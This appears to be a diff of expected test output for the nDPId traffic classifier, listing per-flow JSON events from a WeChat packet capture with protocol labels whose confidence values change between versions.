-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1492167440984,"flow_last_seen":1492167822531,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492167440370,"flow_last_seen":1492167815567,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795087,"flow_last_seen":1492167795096,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492167795292,"flow_last_seen":1492167796728,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
-00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167669545,"flow_last_seen":1492167848542,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795092,"flow_last_seen":1492167795103,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
-00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1492167776953,"flow_last_seen":1492167815112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":25818,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795095,"flow_last_seen":1492167795102,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795088,"flow_last_seen":1492167795100,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492167449288,"flow_last_seen":1492167820408,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1492167440984,"flow_last_seen":1492167822531,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492167440370,"flow_last_seen":1492167815567,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795087,"flow_last_seen":1492167795096,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492167795292,"flow_last_seen":1492167796728,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167669545,"flow_last_seen":1492167848542,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": 
{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795092,"flow_last_seen":1492167795103,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1492167776953,"flow_last_seen":1492167815112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":25818,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Tencent","breed":"Acceptable","category":"SocialNetwork"}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1492167865975,"flow_last_seen":1492167896999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":21218,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167866226,"flow_last_seen":1492167897002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1492167905310,"flow_last_seen":1492167916848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":8052,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1492167788126,"flow_last_seen":1492167911210,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"}} -00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167849769,"flow_last_seen":1492167851204,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795090,"flow_last_seen":1492167795099,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1492167788128,"flow_last_seen":1492167911211,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795091,"flow_last_seen":1492167795098,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1492167865975,"flow_last_seen":1492167896999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":21218,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167866226,"flow_last_seen":1492167897002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1492167905310,"flow_last_seen":1492167916848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":8052,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1492167788126,"flow_last_seen":1492167911210,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 